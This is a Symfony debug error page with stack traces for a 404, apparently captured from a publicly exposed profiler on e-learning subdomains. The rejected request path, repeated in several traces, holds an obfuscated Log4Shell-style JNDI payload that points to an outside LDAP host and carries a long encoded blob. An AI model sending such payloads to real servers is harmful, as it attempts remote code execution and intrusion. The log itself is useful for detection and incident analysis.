Exceptions
Exceptions 2
Symfony\Component\HttpKernel\Exception\ NotFoundHttpException
Show exception properties
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#274 -statusCode: 404 -headers: [] }
if ($referer = $request->headers->get('referer')) {$message .= \sprintf(' (from "%s")', $referer);}throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {$message = \sprintf('No route found for "%s %s": Method Not Allowed (Allow: %s)', $request->getMethod(), $request->getUriForPath($request->getPathInfo()), implode(', ', $e->getAllowedMethods()));throw new MethodNotAllowedHttpException($e->getAllowedMethods(), $message, $e);}
in
vendor/symfony/event-dispatcher/Debug/WrappedListener.php
->
onKernelRequest
(line 115)
$this->priority ??= $dispatcher->getListenerPriority($eventName, $this->listener);$e = $this->stopwatch->start($this->name, 'event_listener');try {($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
__invoke
(line 206)
foreach ($listeners as $listener) {if ($stoppable && $event->isPropagationStopped()) {break;}$listener($event, $eventName, $this);}}/*** Sorts the internal list of listeners for the given event by priority.
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
callListeners
(line 56)
} else {$listeners = $this->getListeners($eventName);}if ($listeners) {$this->callListeners($listeners, $eventName, $event);}return $event;}
in
vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php
->
dispatch
(line 126)
try {$this->beforeDispatch($eventName, $event);try {$e = $this->stopwatch->start($eventName, 'section');try {$this->dispatcher->dispatch($event, $eventName);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/http-kernel/HttpKernel.php
->
dispatch
(line 159)
*/private function handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response{// request$event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);if ($event->hasResponse()) {return $this->filterResponse($event->getResponse(), $request, $type);}
in
vendor/symfony/http-kernel/HttpKernel.php
->
handleRaw
(line 76)
$request->headers->set('X-Php-Ob-Level', (string) ob_get_level());$this->requestStack->push($request);$response = null;try {return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {if ($e instanceof \Error && !$this->handleAllThrowables) {throw $e;}
in
vendor/symfony/http-kernel/Kernel.php
->
handle
(line 193)
if (!$this->handlingHttpCache) {$this->resetServices = true;}try {return $this->getHttpKernel()->handle($request, $type, $catch);} finally {--$this->requestStackSize;}}
in
vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php
->
handle
(line 35)
) {}public function run(): int{$response = $this->kernel->handle($this->request);if (Kernel::VERSION_ID >= 60400) {$response->send(false);if (\function_exists('fastcgi_finish_request') && !$this->debug) {
in
vendor/autoload_runtime.php
->
run
(line 32)
$app = $app(...$args);exit($runtime->getRunner($app)->run());
<?phpuse App\Kernel;require_once dirname(__DIR__).'/vendor/autoload_runtime.php';return function (array $context) {return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);};
Symfony\Component\Routing\Exception\ ResourceNotFoundException
if ($allowSchemes) {goto redirect_scheme;}}throw new ResourceNotFoundException(\sprintf('No routes found for "%s".', $pathinfo));}private function doMatch(string $pathinfo, array &$allow = [], array &$allowSchemes = []): array{$allow = $allowSchemes = [];
in
vendor/symfony/routing/Matcher/UrlMatcher.php
->
match
(line 90)
public function matchRequest(Request $request): array{$this->request = $request;$ret = $this->match($request->getPathInfo());$this->request = null;return $ret;}
in
vendor/symfony/routing/Router.php
->
matchRequest
(line 188)
if (!$matcher instanceof RequestMatcherInterface) {// fallback to the default UrlMatcherInterfacereturn $matcher->match($request->getPathInfo());}return $matcher->matchRequest($request);}/*** Gets the UrlMatcher or RequestMatcher instance associated with this Router.*/
in
vendor/symfony/http-kernel/EventListener/RouterListener.php
->
matchRequest
(line 101)
// add attributes based on the request (routing)try {// matching a request is more powerful than matching a URL path + context, so try that firstif ($this->matcher instanceof RequestMatcherInterface) {$parameters = $this->matcher->matchRequest($request);} else {$parameters = $this->matcher->match($request->getPathInfo());}$this->logger?->info('Matched route "{route}".', [
in
vendor/symfony/event-dispatcher/Debug/WrappedListener.php
->
onKernelRequest
(line 115)
$this->priority ??= $dispatcher->getListenerPriority($eventName, $this->listener);$e = $this->stopwatch->start($this->name, 'event_listener');try {($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
__invoke
(line 206)
foreach ($listeners as $listener) {if ($stoppable && $event->isPropagationStopped()) {break;}$listener($event, $eventName, $this);}}/*** Sorts the internal list of listeners for the given event by priority.
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
callListeners
(line 56)
} else {$listeners = $this->getListeners($eventName);}if ($listeners) {$this->callListeners($listeners, $eventName, $event);}return $event;}
in
vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php
->
dispatch
(line 126)
try {$this->beforeDispatch($eventName, $event);try {$e = $this->stopwatch->start($eventName, 'section');try {$this->dispatcher->dispatch($event, $eventName);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/http-kernel/HttpKernel.php
->
dispatch
(line 159)
*/private function handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response{// request$event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);if ($event->hasResponse()) {return $this->filterResponse($event->getResponse(), $request, $type);}
in
vendor/symfony/http-kernel/HttpKernel.php
->
handleRaw
(line 76)
$request->headers->set('X-Php-Ob-Level', (string) ob_get_level());$this->requestStack->push($request);$response = null;try {return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {if ($e instanceof \Error && !$this->handleAllThrowables) {throw $e;}
in
vendor/symfony/http-kernel/Kernel.php
->
handle
(line 193)
if (!$this->handlingHttpCache) {$this->resetServices = true;}try {return $this->getHttpKernel()->handle($request, $type, $catch);} finally {--$this->requestStackSize;}}
in
vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php
->
handle
(line 35)
) {}public function run(): int{$response = $this->kernel->handle($this->request);if (Kernel::VERSION_ID >= 60400) {$response->send(false);if (\function_exists('fastcgi_finish_request') && !$this->debug) {
in
vendor/autoload_runtime.php
->
run
(line 32)
$app = $app(...$args);exit($runtime->getRunner($app)->run());
<?phpuse App\Kernel;require_once dirname(__DIR__).'/vendor/autoload_runtime.php';return function (array $context) {return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);};
Logs
| Level | Channel | Message |
|---|---|---|
| INFO 23:41:44 | request |
Matched route "_profiler". {
"route": "_profiler",
"route_parameters": {
"_route": "_profiler",
"_controller": "web_profiler.controller.profiler::panelAction",
"token": "latest"
},
"request_uri": "http://profuturo-acto2.aulaexperto.net:8085/_profiler/latest?type=request&url=http%3A%2F%2Fhackettss22.aulaexperto.net%3A8085%2Frobots.txt",
"method": "GET"
}
|
Stack Traces 2
|
[2/2]
NotFoundHttpException
|
|---|
Symfony\Component\HttpKernel\Exception\NotFoundHttpException:
No route found for "GET http://bunge.aulaexperto.net:8085/_profiler/156431/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqKfYvx_iwW1sSY9mW01qiQX_sfWzfjFqfX_5p5jGr0JFtl4iqCLQlpYONLCESif8jNoWvivzKDveFVv4lBbcCd-V5A-eOz7Bst6IqGhS1PIPWdhKwCLZq9v3w4umf6YfbOBuZJT26lX8PIOkctei2fDv5eZdjKHjk5UNQmty_n8QRC0IIqHDCeuMv93NrktDQAP0hTwk36hun80Y8DUt6KUQqJE2E4bikohsG3Ac-0lahgf8TZF7M2eyCOmdWo02vAp5cxzaBHwgsJjEwx3SiNq1rFo1SMki3yvq-XjNI2IjhVqWqjUNxs4ZFtBfFXPT5IktPp9Gv365-JhOg_TTrJfEwLpWy_x3m4u04iMwXyjcxXC9Vq-2qWr0niBYbJyMVNWIfgocwAeY1BREDC-48081oU12ZzWSVDlT2wcVFHHRVld5shQDxrfzV6lyZB9GlSiYjSwLV9sIhxO-9JWBbO0N_98D3E5UkaL7hDzc5qqzAKf89GtBHrInjLy7o8FPx_Od1bEEwt2iu_AYL7rrNQJVB6ZSSaafAPo4hlT9XkhWLooniCKv0u3_EvxOSB2EAx0CjCym1aPQQf4SfkJ5niF2BeGEG2V50F4wUc0CoXE7jzk4KKB7ogHWhCgM6FrJVPeTLwI4pdCBZvjwaa6pB_RwDKfI_FcVLI_r3lPRfA3s942sj0OiUD2gh57UDbv8uqNo6wXOlikUGcbsDaVxn7Z4KLXoiTQzvv9-NSt7ZFit1Vzr3rL-T56AIvjYjtYT-UGul5dCHXcW-7dIFDrcSDQ0YlPs_KTM75E3-8usDEV2XJWx4t--k2bx4P2PaBcmuVA9H3myG5Hk0T1clnNgXgTi3SoLquVnWmbV-jdXbS1wfIUOaJkmJo8uOxZKZjIh8mJhaHwDXkWFU6paQJ_SmeoPVp1lUWlb90oA3V6HiTzzLWaAAyQSelkFrieMNRwKboCRWALvI422Ze7q1WStIBiKbTE5q_4l9zBROXShTV3v_zlWwm8_2T4eFWoEGbxyuTRTV4O0ffl9A0qHYea2sr00RFZ3tN0g7sBnIKvebfCcnOpbCa_JY_pzQSD0N8TTgbE4I43Oa-rsVBHscs6Nr4nhbJ-Kdxq9Vvmt12VEQvwBu_-PTRnpAkCiS0zhorBx7d3iKHOdJIkrkO6_xXxlUIkp12JWD0w8TcxtPMUFUl6z4kKx4NiZBk7oYYZRsrt9R-ajFTZ75DstZUs_qN7PZy5LKWdb3wlS-IhR2bphazW7W3N7bfLfE8s-asXx67yWvbycDXm-yGVw4PuR6zE2TQgOX3irr3Ws-dmuBEjNFFWRraAFhubswGFiTYuvSQRlbKrmQJtOocZy-2DKFXbB5XPJqOF_2D1JiBMLWa5YxC8Qog3j3WoJEm5GCnTE2Qn9wGF2VW4WEdMFcM1XCo8kglvoEfB--LiyegQaXbxuAo6G3ekvdnF5lPvIw8tD79xzASg5s78gnrbsytvUKmK8NQqBbDBo9WMyZ-K2cc5_6FrMnWPLXlqHghDj2UItwhmKBe-x631wB3dNHisCZLDQTP6jLJzpm6qhvbepiyqjfYNFNqr-vLMJKkag2Qip8I4jHB2TpdahT_3rKTNbhQKlvGOnoEN6nM8GBLHg3BberBrcUSr4CfLEqaclOxGcwYMB0-iTR13eBnEervm_C57miymVJLfO5eEHD4wamHD6glBE7f71l9N9Zi2qEDPCN9BWT3UaIa_L9ynauH41pMBUBvR2ZBWrX8st28Top607F1Z1Xubhq28_11YqC9lCI493Lf3jA5K76ThbXv3KRQtlurwv6EhquCBM4JJdFgxosxEhNdnKUsrNdk2crv_6uw2RF6YfAqTYP0IsiTlbHYYaAUMgZmcXVBrCeExs_oRvls_SpglzMowep1nTcbudumMFYD4McXlyXAx5MLCbgAelOsIqoXZSnhnzKzcWABmgJsOcyYGdN411TzJbRb_-lwBnQTcC4EtrS7_sAGKUMYS3ZRgbFZkAFnlVXjVR4NIoGM8_DZ4TNtHkZ6ZHZyc0HFLcd1urHQqRNNQSx37LeyT-j3L3eqt730UUMmBcaCBbVUcCzbzNP9t9Et2X72pgChMd63rSoiOx_Qftk_reiBeL6WZPVduL7Hun6RYvdMzfSNg9-A2DWBQjCZJCy3o_-R8mjdjRmaxWLymlFMbXOA5AQMCEYvIAAMR7PsWN5S_vTdA3PJggQEh3D1RgKV-4zeKzuUqFeedsUghLOXH-FsbHgU0S7UJJRi0HT5co6ZfVjHsaBLn4Hzg0o6y7KebO65rLlNbpomQvayYuzAnTDtVGOqqkQ77cZHV3JavL1DfVUO_EyOJ0xLmo8vUEBf7xtXuZIAjXg0SSBPt-Znv1nQl3MW1KTUuzclmmv4KWGx8bauFE4y7hKun_ejaGT0DgDOf3xO6vq0NdrBHZqqtq_A1FZp1IC7l0Dz3gRdLJ25xTorzeaQKNsU_zEaJ7VOLOnmHJBDEUyf5s65Tma5mD1ReGGckfbWgdzkSgdhrOYRoRIrkyzGY79jflSTuRWK6I3qI1qdrDjW4zlQyv5NT9EKNqh7PfnT_jo8027YlNr0yyY6uUE96k=%7D/"
at vendor/symfony/http-kernel/EventListener/RouterListener.php:156
at Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115)
at Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/EventDispatcher.php:206)
at Symfony\Component\EventDispatcher\EventDispatcher->callListeners(array(object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener)), 'kernel.request', object(RequestEvent))
(vendor/symfony/event-dispatcher/EventDispatcher.php:56)
at Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126)
at Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/http-kernel/HttpKernel.php:159)
at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
(vendor/symfony/http-kernel/HttpKernel.php:76)
at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
(vendor/symfony/http-kernel/Kernel.php:193)
at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
(vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35)
at Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run()
(vendor/autoload_runtime.php:32)
at require_once('/var/www/html/vendor/autoload_runtime.php')
(public/index.php:5)
|
|
[1/2]
ResourceNotFoundException
|
|---|
Symfony\Component\Routing\Exception\ResourceNotFoundException:
No routes found for "/_profiler/156431/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqKfYvx_iwW1sSY9mW01qiQX_sfWzfjFqfX_5p5jGr0JFtl4iqCLQlpYONLCESif8jNoWvivzKDveFVv4lBbcCd-V5A-eOz7Bst6IqGhS1PIPWdhKwCLZq9v3w4umf6YfbOBuZJT26lX8PIOkctei2fDv5eZdjKHjk5UNQmty_n8QRC0IIqHDCeuMv93NrktDQAP0hTwk36hun80Y8DUt6KUQqJE2E4bikohsG3Ac-0lahgf8TZF7M2eyCOmdWo02vAp5cxzaBHwgsJjEwx3SiNq1rFo1SMki3yvq-XjNI2IjhVqWqjUNxs4ZFtBfFXPT5IktPp9Gv365-JhOg_TTrJfEwLpWy_x3m4u04iMwXyjcxXC9Vq-2qWr0niBYbJyMVNWIfgocwAeY1BREDC-48081oU12ZzWSVDlT2wcVFHHRVld5shQDxrfzV6lyZB9GlSiYjSwLV9sIhxO-9JWBbO0N_98D3E5UkaL7hDzc5qqzAKf89GtBHrInjLy7o8FPx_Od1bEEwt2iu_AYL7rrNQJVB6ZSSaafAPo4hlT9XkhWLooniCKv0u3_EvxOSB2EAx0CjCym1aPQQf4SfkJ5niF2BeGEG2V50F4wUc0CoXE7jzk4KKB7ogHWhCgM6FrJVPeTLwI4pdCBZvjwaa6pB_RwDKfI_FcVLI_r3lPRfA3s942sj0OiUD2gh57UDbv8uqNo6wXOlikUGcbsDaVxn7Z4KLXoiTQzvv9-NSt7ZFit1Vzr3rL-T56AIvjYjtYT-UGul5dCHXcW-7dIFDrcSDQ0YlPs_KTM75E3-8usDEV2XJWx4t--k2bx4P2PaBcmuVA9H3myG5Hk0T1clnNgXgTi3SoLquVnWmbV-jdXbS1wfIUOaJkmJo8uOxZKZjIh8mJhaHwDXkWFU6paQJ_SmeoPVp1lUWlb90oA3V6HiTzzLWaAAyQSelkFrieMNRwKboCRWALvI422Ze7q1WStIBiKbTE5q_4l9zBROXShTV3v_zlWwm8_2T4eFWoEGbxyuTRTV4O0ffl9A0qHYea2sr00RFZ3tN0g7sBnIKvebfCcnOpbCa_JY_pzQSD0N8TTgbE4I43Oa-rsVBHscs6Nr4nhbJ-Kdxq9Vvmt12VEQvwBu_-PTRnpAkCiS0zhorBx7d3iKHOdJIkrkO6_xXxlUIkp12JWD0w8TcxtPMUFUl6z4kKx4NiZBk7oYYZRsrt9R-ajFTZ75DstZUs_qN7PZy5LKWdb3wlS-IhR2bphazW7W3N7bfLfE8s-asXx67yWvbycDXm-yGVw4PuR6zE2TQgOX3irr3Ws-dmuBEjNFFWRraAFhubswGFiTYuvSQRlbKrmQJtOocZy-2DKFXbB5XPJqOF_2D1JiBMLWa5YxC8Qog3j3WoJEm5GCnTE2Qn9wGF2VW4WEdMFcM1XCo8kglvoEfB--LiyegQaXbxuAo6G3ekvdnF5lPvIw8tD79xzASg5s78gnrbsytvUKmK8NQqBbDBo9WMyZ-K2cc5_6FrMnWPLXlqHghDj2UItwhmKBe-x631wB3dNHisCZLDQTP6jLJzpm6qhvbepiyqjfYNFNqr-vLMJKkag2Qip8I4jHB2TpdahT_3rKTNbhQKlvGOnoEN6nM8GBLHg3BberBrcUSr4CfLEqaclOxGcwYMB0-iTR13eBnEervm_C57miymVJLfO5eEHD4wamHD6glBE7f71l9N9Zi2qEDPCN9BWT3UaIa_L9ynauH41pMBUBvR2ZBWrX8st28Top607F1Z1Xubhq28_11YqC9lCI493Lf3jA5K76ThbXv3KRQtlurwv6EhquCBM4JJdFgxosxEhNdnKUsrNdk2crv_6uw2RF6YfAqTYP0IsiTlbHYYaAUMgZmcXVBrCeExs_oRvls_SpglzMowep1nTcbudumMFYD4McXlyXAx5MLCbgAelOsIqoXZSnhnzKzcWABmgJsOcyYGdN411TzJbRb_-lwBnQTcC4EtrS7_sAGKUMYS3ZRgbFZkAFnlVXjVR4NIoGM8_DZ4TNtHkZ6ZHZyc0HFLcd1urHQqRNNQSx37LeyT-j3L3eqt730UUMmBcaCBbVUcCzbzNP9t9Et2X72pgChMd63rSoiOx_Qftk_reiBeL6WZPVduL7Hun6RYvdMzfSNg9-A2DWBQjCZJCy3o_-R8mjdjRmaxWLymlFMbXOA5AQMCEYvIAAMR7PsWN5S_vTdA3PJggQEh3D1RgKV-4zeKzuUqFeedsUghLOXH-FsbHgU0S7UJJRi0HT5co6ZfVjHsaBLn4Hzg0o6y7KebO65rLlNbpomQvayYuzAnTDtVGOqqkQ77cZHV3JavL1DfVUO_EyOJ0xLmo8vUEBf7xtXuZIAjXg0SSBPt-Znv1nQl3MW1KTUuzclmmv4KWGx8bauFE4y7hKun_ejaGT0DgDOf3xO6vq0NdrBHZqqtq_A1FZp1IC7l0Dz3gRdLJ25xTorzeaQKNsU_zEaJ7VOLOnmHJBDEUyf5s65Tma5mD1ReGGckfbWgdzkSgdhrOYRoRIrkyzGY79jflSTuRWK6I3qI1qdrDjW4zlQyv5NT9EKNqh7PfnT_jo8027YlNr0yyY6uUE96k=%7D".
at vendor/symfony/routing/Matcher/Dumper/CompiledUrlMatcherTrait.php:70
at Symfony\Component\Routing\Matcher\CompiledUrlMatcher->match('/_profiler/156431/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqKfYvx_iwW1sSY9mW01qiQX_sfWzfjFqfX_5p5jGr0JFtl4iqCLQlpYONLCESif8jNoWvivzKDveFVv4lBbcCd-V5A-eOz7Bst6IqGhS1PIPWdhKwCLZq9v3w4umf6YfbOBuZJT26lX8PIOkctei2fDv5eZdjKHjk5UNQmty_n8QRC0IIqHDCeuMv93NrktDQAP0hTwk36hun80Y8DUt6KUQqJE2E4bikohsG3Ac-0lahgf8TZF7M2eyCOmdWo02vAp5cxzaBHwgsJjEwx3SiNq1rFo1SMki3yvq-XjNI2IjhVqWqjUNxs4ZFtBfFXPT5IktPp9Gv365-JhOg_TTrJfEwLpWy_x3m4u04iMwXyjcxXC9Vq-2qWr0niBYbJyMVNWIfgocwAeY1BREDC-48081oU12ZzWSVDlT2wcVFHHRVld5shQDxrfzV6lyZB9GlSiYjSwLV9sIhxO-9JWBbO0N_98D3E5UkaL7hDzc5qqzAKf89GtBHrInjLy7o8FPx_Od1bEEwt2iu_AYL7rrNQJVB6ZSSaafAPo4hlT9XkhWLooniCKv0u3_EvxOSB2EAx0CjCym1aPQQf4SfkJ5niF2BeGEG2V50F4wUc0CoXE7jzk4KKB7ogHWhCgM6FrJVPeTLwI4pdCBZvjwaa6pB_RwDKfI_FcVLI_r3lPRfA3s942sj0OiUD2gh57UDbv8uqNo6wXOlikUGcbsDaVxn7Z4KLXoiTQzvv9-NSt7ZFit1Vzr3rL-T56AIvjYjtYT-UGul5dCHXcW-7dIFDrcSDQ0YlPs_KTM75E3-8usDEV2XJWx4t--k2bx4P2PaBcmuVA9H3myG5Hk0T1clnNgXgTi3SoLquVnWmbV-jdXbS1wfIUOaJkmJo8uOxZKZjIh8mJhaHwDXkWFU6paQJ_SmeoPVp1lUWlb90oA3V6HiTzzLWaAAyQSelkFrieMNRwKboCRWALvI422Ze7q1WStIBiKbTE5q_4l9zBROXShTV3v_zlWwm8_2T4eFWoEGbxyuTRTV4O0ffl9A0qHYea2sr00RFZ3tN0g7sBnIKvebfCcnOpbCa_JY_pzQSD0N8TTgbE4I43Oa-rsVBHscs6Nr4nhbJ-Kdxq9Vvmt12VEQvwBu_-PTRnpAkCiS0zhorBx7d3iKHOdJIkrkO6_xXxlUIkp12JWD0w8TcxtPMUFUl6z4kKx4NiZBk7oYYZRsrt9R-ajFTZ75DstZUs_qN7PZy5LKWdb3wlS-IhR2bphazW7W3N7bfLfE8s-asXx67yWvbycDXm-yGVw4PuR6zE2TQgOX3irr3Ws-dmuBEjNFFWRraAFhubswGFiTYuvSQRlbKrmQJtOocZy-2DKFXbB5XPJqOF_2D1JiBMLWa5YxC8Qog3j3WoJEm5GCnTE2Qn9wGF2VW4WEdMFcM1XCo8kglvoEfB--LiyegQaXbxuAo6G3ekvdnF5lPvIw8tD79xzASg5s78gnrbsytvUKmK8NQqBbDBo9WMyZ-K2cc5_6FrMnWPLXlqHghDj2UItwhmKBe-x631wB3dNHisCZLDQTP6jLJzpm6qhvbepiyqjfYNFNqr-vLMJKkag2Qip8I4jHB2TpdahT_3rKTNbhQKlvGOnoEN6nM8GBLHg3BberBrcUSr4CfLEqaclOxGcwYMB0-iTR13eBnEervm_C57miymVJLfO5eEHD4wamHD6glBE7f71l9N9Zi2qEDPCN9BWT3UaIa_L9ynauH41pMBUBvR2ZBWrX8st28Top607F1Z1Xubhq28_11YqC9lCI493Lf3jA5K76ThbXv3KRQtlurwv6EhquCBM4JJdFgxosxEhNdnKUsrNdk2crv_6uw2RF6YfAqTYP0IsiTlbHYYaAUMgZmcXVBrCeExs_oRvls_SpglzMowep1nTcbudumMFYD4McXlyXAx5MLCbgAelOsIqoXZSnhnzKzcWABmgJsOcyYGdN411TzJbRb_-lwBnQTcC4EtrS7_sAGKUMYS3ZRgbFZkAFnlVXjVR4NIoGM8_DZ4TNtHkZ6ZHZyc0HFLcd1urHQqRNNQSx37LeyT-j3L3eqt730UUMmBcaCBbVUcCzbzNP9t9Et2X72pgChMd63rSoiOx_Qftk_reiBeL6WZPVduL7Hun6RYvdMzfSNg9-A2DWBQjCZJCy3o_-R8mjdjRmaxWLymlFMbXOA5AQMCEYvIAAMR7PsWN5S_vTdA3PJggQEh3D1RgKV-4zeKzuUqFeedsUghLOXH-FsbHgU0S7UJJRi0HT5co6ZfVjHsaBLn4Hzg0o6y7KebO65rLlNbpomQvayYuzAnTDtVGOqqkQ77cZHV3JavL1DfVUO_EyOJ0xLmo8vUEBf7xtXuZIAjXg0SSBPt-Znv1nQl3MW1KTUuzclmmv4KWGx8bauFE4y7hKun_ejaGT0DgDOf3xO6vq0NdrBHZqqtq_A1FZp1IC7l0Dz3gRdLJ25xTorzeaQKNsU_zEaJ7VOLOnmHJBDEUyf5s65Tma5mD1ReGGckfbWgdzkSgdhrOYRoRIrkyzGY79jflSTuRWK6I3qI1qdrDjW4zlQyv5NT9EKNqh7PfnT_jo8027YlNr0yyY6uUE96k=%7D')
(vendor/symfony/routing/Matcher/UrlMatcher.php:90)
at Symfony\Component\Routing\Matcher\UrlMatcher->matchRequest(object(Request))
(vendor/symfony/routing/Router.php:188)
at Symfony\Component\Routing\Router->matchRequest(object(Request))
(vendor/symfony/http-kernel/EventListener/RouterListener.php:101)
at Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115)
at Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/EventDispatcher.php:206)
at Symfony\Component\EventDispatcher\EventDispatcher->callListeners(array(object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener)), 'kernel.request', object(RequestEvent))
(vendor/symfony/event-dispatcher/EventDispatcher.php:56)
at Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126)
at Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/http-kernel/HttpKernel.php:159)
at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
(vendor/symfony/http-kernel/HttpKernel.php:76)
at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
(vendor/symfony/http-kernel/Kernel.php:193)
at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
(vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35)
at Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run()
(vendor/autoload_runtime.php:32)
at require_once('/var/www/html/vendor/autoload_runtime.php')
(public/index.php:5)
|